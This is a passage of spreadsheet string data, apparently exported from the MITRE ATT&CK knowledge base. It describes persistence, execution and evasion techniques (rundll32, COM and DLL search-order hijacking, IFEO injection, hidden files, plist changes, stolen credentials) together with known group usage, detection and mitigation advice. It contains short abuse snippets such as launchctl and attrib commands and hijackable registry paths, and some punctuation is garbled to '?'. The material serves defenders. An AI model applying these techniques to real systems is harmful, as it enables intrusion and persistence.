    <t>https://attack.mitre.org/wiki/Technique/T1118</t>
  </si>
  <si>
    <t>[[Group/G0047|Gamaredon Group]] has used various batch scripts to establish C2, download additional files, and conduct other functions.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has a tool that can run DLLs.[[CiteRef::FireEye Clandestine Fox]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can use PowerSploit or other scripting frameworks to perform execution.[[CiteRef::Cobalt Strike TTPs Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0016|APT29]] has used encoded PowerShell scripts uploaded to [[Software/S0046|CozyCar]] installations to download and install [[Software/S0053|SeaDuke]], as well as to evade defenses.[[CiteRef::Symantec Seaduke 2015]][[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has used PowerShell on victim systems to download and run payloads after exploitation.[[CiteRef::FireEye Operation Double Tap]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has used .bat and .vbs scripts for execution.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0009|Deep Panda]] has used regsvr32.exe to execute a server variant of [[Software/S0021|Derusbi]] in victim networks.[[CiteRef::RSA Shell Crew]]</t>
  </si>
  <si>
    <t>[[Group/G0008|Carbanak]] installs VNC server software that executes through rundll32.[[CiteRef::Kaspersky Carbanak]]</t>
  </si>
  <si>
    <t>[[Software/S0021|Derusbi]] variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.[[CiteRef::ThreatGeek Derusbi Converge]]</t>
  </si>
  <si>
    <t>[[Software/S0044|JHUHUGIT]] is executed using rundll32.exe.[[CiteRef::F-Secure Sofacy 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0137|CORESHELL]] is installed via execution of rundll32 with an export named "init" or "InitW."[[CiteRef::Microsoft SIR Vol 19]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] executed [[Software/S0023|CHOPSTICK]] by using rundll32 commands such as &lt;code&gt;rundll32.exe ?C:\Windows\twain_64.dll?&lt;/code&gt;.[[CiteRef::Crowdstrike DNC June 2016]] [[Group/G0007|APT28]] also executed a .dll for a first stage dropper using rundll32.exe.[[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] has used rundll32.exe in a Registry value to establish persistence.[[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0046|FIN7]] has used mshta.exe to execute VBScript to execute malicious code on victim systems.[[CiteRef::FireEye FIN7 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0053|SeaDuke]] uses a module to execute Mimikatz with PowerShell to perform [[Technique/T1097|Pass the Ticket]].[[CiteRef::Symantec Seaduke 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] uses rundll32.exe to load.[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0006|APT1]] has used batch scripting to automate execution of commands.[[CiteRef::Mandiant APT1]]</t>
  </si>
  <si>
    <t>The [[Software/S0046|CozyCar]] dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main [[Software/S0046|CozyCar]] component.[[CiteRef::F-Secure CozyDuke]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] runs its core DLL file using rundll32.exe.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>After copying itself to a DLL file, a variant of [[Software/S0081|Elise]] calls the DLL file using rundll32.exe.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>Variants of [[Software/S0082|Emissary]] have used rundll32.exe in Registry values added to establish persistence.[[CiteRef::Emissary Trojan Feb 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] used various scripts for execution, and was observed installing Python 2.7 on a victim.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0051|FIN10]] has executed malicious .bat files containing PowerShell commands.[[CiteRef::FireEye FIN10 June 2017]]</t>
  </si>
  <si>
    <t>The [[Software/S0141|Winnti]] installer loads a DLL using rundll32.[[CiteRef::Microsoft Winnti Jan 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0037|FIN6]] has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener. [[Group/G0037|FIN6]] has also used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0009|Deep Panda]] has used PowerShell scripts to download and execute programs in memory, without writing to disk.[[CiteRef::Alperovitch 2014]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] created a [[Technique/T1053|Scheduled Task]] that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has used VBS, VBE, and batch scripts for execution.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0052|CopyKittens]] uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.[[CiteRef::ClearSky Wilted Tulip July 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0147|Pteranodon]] executes functions using rundll32.exe.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0074|Sakula]] calls cmd.exe to run various DLL files via rundll32.[[CiteRef::Dell Sakula]]</t>
  </si>
  <si>
    <t>[[Software/S0142|StreamEx]] uses rundll32 to call an exported function.[[CiteRef::Cylance Shell Crew Feb 2017]]</t>
  </si>
  <si>
    <t>Defense Evasion,Execution,Persistence</t>
  </si>
  <si>
    <t>Launchctl</t>
  </si>
  <si>
    <t>Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made [[CiteRef::Sofacy Komplex Trojan]]. Running a command from launchctl is as simple as &lt;code&gt;launchctl submit -l &lt;labelName&gt; -- /Path/to/thing/to/execute "arg" "arg" "arg"&lt;/code&gt;. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges. 
Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.</t>
  </si>
  <si>
    <t>Knock Knock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk somewhere which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes. ,</t>
  </si>
  <si>
    <t>Prevent users from installing their own launch agents or launch daemons and instead require them to be pushed out by group policy.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1152</t>
  </si>
  <si>
    <t>Defense Evasion,Persistence</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>[[Software/S0044|JHUHUGIT]] has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object ({3543619C-D563-43f7-95EA-4DA7E1CC396A}).[[CiteRef::ESET Sednit Part 1]]</t>
  </si>
  <si>
    <t>Windows Registry,DLL monitoring,Loaded DLLs</t>
  </si>
  <si>
    <t>Autoruns Analysis</t>
  </si>
  <si>
    <t>There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations replacing know binary paths with unknown paths. Even though some third party applications define user COM objects, the presence of objects within &lt;code&gt;HKEY_CURRENT_USER\Software\Classes\CLSID\&lt;/code&gt; may be anomalous and should be investigated since user objects will be loaded prior to machine objects in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\&lt;/code&gt;.[[CiteRef::Endgame COM Hijacking]] Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. ,</t>
  </si>
  <si>
    <t>Direct mitigation of this technique may not be recommended for a particular environment since COM objects are a legitimate part of the operating system and installed software. Blocking COM object changes may have unforeseen side effects to legitimate functionality.
Instead, identify and block potentially malicious software that may execute, or be executed by, this technique using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>ENDGAME</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1122</t>
  </si>
  <si>
    <t>Some variants of [[Software/S0045|ADVSTORESHELL]] achieve persistence by registering the payload as a Shell Icon Overlay handler COM object.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ?hidden? file. These files don?t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (&lt;code&gt;dir /a&lt;/code&gt; for Windows and &lt;code&gt;ls ?a&lt;/code&gt; for Linux and macOS).
===Windows===
Users can mark specific files as hidden by using the attrib.exe binary. Simply do &lt;code&gt;attrib +h filename&lt;/code&gt; to mark a file or folder as hidden. Similarly, the ?+s? marks a file as a system file and the ?+r? flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively ?/S?.
===Linux/Mac===
Users can mark specific files as hidden simply by putting a ?.? as the first character in the file or folder name [[CiteRef::Sofacy Komplex Trojan]][[CiteRef::Antiquated Mac Malware]]. Files and folder that start with a period, ?.?, are by default hidden from being viewed in the Finder application and standard command-line utilities like ?ls?. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: &lt;code&gt;defaults write com.apple.finder AppleShowAllFiles YES&lt;/code&gt;, and then relaunch the Finder Application.
===Mac===
Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app[[CiteRef::WireLurker]].
Many applications create these hidden files and folders to store information so that it doesn?t clutter up the user?s workspace. For example, SSH utilities create a .ssh folder that?s hidden and contains the user?s known hosts and keys. 
Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute. ,</t>
  </si>
  <si>
    <t>Mitigation of this technique may be difficult and unadvised due to the the legitimate use of hidden files and directories.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1158</t>
  </si>
  <si>
    <t>[[Software/S0126|ComRAT]] samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location &lt;code&gt;HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32&lt;/code&gt;.[[CiteRef::NorthSec 2015 GData Uroburos Tools]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has used COM hijacking for persistence by replacing the legitimate &lt;code&gt;MMDeviceEnumerator&lt;/code&gt; object with a payload.[[CiteRef::ESET Sednit Part 1]]</t>
  </si>
  <si>
    <t>Redundant Access</t>
  </si>
  <si>
    <t>[[Group/G0053|FIN5]] maintains access to victim environments by using [[Technique/T1078|Valid Accounts]] to access [[Technique/T1133|External Remote Services]] as well as establishing a backup RDP tunnel by using [[Software/S0173|FLIPSIDE]].[[CiteRef::Mandiant FIN5 GrrCON Oct 2016]]</t>
  </si>
  <si>
    <t>Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Binary file metadata,Authentication logs</t>
  </si>
  <si>
    <t>Anti-virus,Network intrusion detection system</t>
  </si>
  <si>
    <t>Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.
Detection of tools based on beacon traffic, [[Command and Control]] protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.
If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.
For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [[Technique/T1078|Valid Accounts]] and [[Technique/T1133|External Remote Services]] to collect account use information. ,</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may be used as a remote access tool, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1108</t>
  </si>
  <si>
    <t>The Microsoft Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.[[CiteRef::Microsoft Component Object Model]] Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.[[CiteRef::GDATA COM Hijacking]] An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</t>
  </si>
  <si>
    <t>Component Firmware</t>
  </si>
  <si>
    <t>Equation</t>
  </si>
  <si>
    <t>Equation ,</t>
  </si>
  <si>
    <t>G0020</t>
  </si>
  <si>
    <t>The [[Group/G0020|Equation]] group is known to have the capability to overwrite the firmware on hard drives from some manufacturers.[[CiteRef::Kaspersky Equation QA]]</t>
  </si>
  <si>
    <t>Anti-virus,File monitoring,Host intrusion prevention systems</t>
  </si>
  <si>
    <t>SYSTEM</t>
  </si>
  <si>
    <t>Ability to update component device firmware from the host operating system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1109</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] has deployed backup web shells and obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [[Technique/T1019|System Firmware]] but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.</t>
  </si>
  <si>
    <t>Adversaries may use more than one remote access tool with varying command and control protocols as a hedge against detection. If one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary's tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to [[Technique/T1078|Valid Accounts]] to use [[Technique/T1133|External Remote Services]] such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.[[CiteRef::Mandiant APT1]]
Use of a [[Technique/T1100|Web Shell]] is one such way to maintain access to a network through an externally accessible Web server.</t>
  </si>
  <si>
    <t>[[Software/S0066|3PARA RAT]] will sleep until after a date/time value loaded from a .dat file has passed. This allows the RAT to remain dormant until a set date, which could allow a means to regain access if other parts of the actors' toolset are removed from a victim.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>The [[Software/S0162|Komplex]] payload is stored in a hidden directory at &lt;code&gt;/Users/Shared/.local/kextd&lt;/code&gt;[[CiteRef::Sofacy Komplex Trojan]].</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used an IIS backdoor (RGDoor) via Web shell to establish redundant access. The group has also used harvested credentials to gain access to Internet-accessible resources such as Outlook Web Access, which could be used for redundant access.[[CiteRef::Unit 42 Playbook OilRig Dec 2017]]</t>
  </si>
  <si>
    <t>Defense Evasion,Persistence,Privilege Escalation</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, any executable file present in an application?s IFEO will be prepended to the application?s name, effectively launching the new process under the debugger (e.g., ?C:\dbg\ntsd.exe -g  notepad.exe?).[[CiteRef::Microsoft Dev Blog IFEO Mar 2010]]
IFEOs can be set directly via the Registry or in Global Flags via the Gflags tool.[[CiteRef::Microsoft GFlags Mar 2017]] IFEOs are represented as Debugger Values in the Registry under &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/&lt;executable&gt;&lt;/code&gt; and &lt;code&gt; HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt; &lt;/code&gt; where &lt;code&gt;&lt;executable&gt;&lt;/code&gt; is the binary on which the debugger is attached.[[CiteRef::Microsoft Dev Blog IFEO Mar 2010]]
Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.[[CiteRef::Engame Process Injection July 2017]] Installing IFEO mechanisms may also provide [[Persistence]] via continuous invocation.
Malware may also use IFEO for [[Defense Evasion]] by registering invalid debuggers that redirect and effectively disable various system and security applications.[[CiteRef::FSecure Hupigon]][[CiteRef::Symantec Ushedix June 2008]]</t>
  </si>
  <si>
    <t>Process Monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;.[[CiteRef::Microsoft Dev Blog IFEO Mar 2010]]
Monitor the IFEOs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx.[[CiteRef::Engame Process Injection July 2017]] ,</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all IFEO will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly.[[CiteRef::Microsoft IFEOorMalware July 2015]] Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.
Identify and block potentially malicious software that may be executed through IFEO by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown executables.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1183</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>Windows systems use a common method to look for required DLLs to load into a program.[[CiteRef::Microsoft DLL Search]] Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. 
Adversaries may perform DLL preloading, also called binary planting attacks,[[CiteRef::OWASP Binary Planting]] by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL.[[CiteRef::Microsoft 2269637]] Adversaries may use this behavior to cause the program to load a malicious DLL. 
Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation.[[CiteRef::Microsoft DLL Redirection]][[CiteRef::Microsoft Manifests]][[CiteRef::Mandiant Search Order]]
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</t>
  </si>
  <si>
    <t>File monitoring,DLL monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious. ,</t>
  </si>
  <si>
    <t>Disallow loading of remote DLLs.[[CiteRef::Microsoft DLL Preloading]] This is included by default in Windows Server 2012+ and is available by patch for XP+ and Server 2003+.[[CiteRef::Microsoft DLL Search Path Algorithm]]
Enable Safe DLL Search Mode to force search for system DLLs in directories with greater restrictions (e.g. &lt;code&gt;%SYSTEMROOT%&lt;/code&gt;)to be used before local directory DLLs (e.g. a user's home directory). The Safe DLL Search Mode can be enabled via Group Policy at Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode.  The associated Windows Registry key for this is located at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDLLSearchMode&lt;/code&gt;[[CiteRef::Microsoft DLL Search]]
Use auditing tools capable of detecting DLL search order hijacking opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for DLL hijacking weaknesses.[[CiteRef::Powersploit]]
Identify and block potentially malicious software that may be executed through search order hijacking by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown DLLs.</t>
  </si>
  <si>
    <t>Ability to add a DLL, manifest file, or .local file, directory, or junction.</t>
  </si>
  <si>
    <t>Stefan Kanthak,Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1038</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has used legitimate credentials to maintain access to a victim network and exfiltrate data.[[CiteRef::Trend Micro Pawn Storm April 2017]]</t>
  </si>
  <si>
    <t>Authentication logs,Process monitoring</t>
  </si>
  <si>
    <t>Anti-virus,Firewall,Host intrusion prevention systems,Network intrusion detection system,Process whitelisting,System access controls</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise.[[CiteRef::TechNet Audit Policy]] Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times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not entered the building or does not have VPN access).
Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. ,</t>
  </si>
  <si>
    <t>Take measures to detect or prevent techniques such as [[Technique/T1003|Credential Dumping]] or installation of keyloggers to acquire credentials through [[Technique/T1056|Input Capture]]. Limit credential overlap across systems to prevent access if account credentials are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.[[CiteRef::Microsoft Securing Privileged Access]]. Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.[[CiteRef::TechNet Credential Theft]][[CiteRef::TechNet Least Privilege]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1078</t>
  </si>
  <si>
    <t>[[Group/G0053|FIN5]] has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment.[[CiteRef::FireEye Respond Webinar July 2017]][[CiteRef::DarkReading FireEye FIN5 Oct 2015]][[CiteRef::Mandiant FIN5 GrrCON Oct 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0051|FIN10]] has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor. The group has also moved laterally using the Local Administrator account.[[CiteRef::FireEye FIN10 June 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used compromised credentials to access other systems on a victim network.[[CiteRef::Unit 42 Playbook OilRig Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has used valid accounts shared between Managed Service Providers and clients to move between the two environments.[[CiteRef::PWC Cloud Hopper April 2017]]</t>
  </si>
  <si>
    <t>To move laterally on a victim network, [[Group/G0037|FIN6]] has used credentials stolen from various systems on which it gathered usernames and password hashes.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can use known credentials to run commands and spawn processes as another user.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] leverages valid accounts after gaining credentials for use within the victim domain.[[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>[[Group/G0008|Carbanak]] actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars.[[CiteRef::Kaspersky Carbanak]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has used valid administrator credentials to assist in lateral movement.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] has used legitimate local admin account credentials.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0011|PittyTiger]] attempts to obtain legitimate credentials during operations.[[CiteRef::Bizeul 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] is launched through use of DLL search order hijacking to load a malicious dll.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0070|HTTPBrowser]] abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll.[[CiteRef::ZScaler Hacking Team]]</t>
  </si>
  <si>
    <t>Software: WEBC2</t>
  </si>
  <si>
    <t>Variants of [[Software/S0109|WEBC2]] achieve persistence by using DLL search order hijacking, usually by copying the DLL file to &lt;code&gt;%SYSTEMROOT%&lt;/code&gt; (&lt;code&gt;C:\WINDOWS\ntshrui.dll&lt;/code&gt;).[[CiteRef::Mandiant APT1 Appendix]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has used DLL search order hijacking.[[CiteRef::PWC Cloud Hopper April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0026|APT18]] actors leverage legitimate credentials to log into external remote services.[[CiteRef::RSA2017 Detect and Respond Adair]]</t>
  </si>
  <si>
    <t>Adversaries may steal the credentials of a specific user or service account using [[Credential Access]] techniques. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network and may even be used for persistent access to remote systems. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Adversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful. 
The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.[[CiteRef::TechNet Credential Theft]]</t>
  </si>
  <si>
    <t>[[Group/G0028|Threat Group-1314]] actors used compromised credentials for the victim's endpoint management platform, Altiris, to move laterally.[[CiteRef::Dell TG-1314]]</t>
  </si>
  <si>
    <t>[[Group/G0039|Suckfly]] used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner.[[CiteRef::Symantec Suckfly May 2016]]</t>
  </si>
  <si>
    <t>Plist Modification</t>
  </si>
  <si>
    <t>Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UT-8 encoded and formatted like XML documents via a series of keys surrounded by &lt; &gt;. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as &lt;code&gt;/Library/Preferences&lt;/code&gt; (which execute with elevated privileges) and &lt;code&gt;~/Library/Preferences&lt;/code&gt; (which execute with a user's privileges). 
Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism.[[CiteRef::Sofacy Komplex Trojan]]</t>
  </si>
  <si>
    <t>File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity. ,</t>
  </si>
  <si>
    <t>Prevent plist files from being modified by users by making them read-only.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1150</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] has used OWA account credentials to attempt to regain access to a victim network after eviction.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
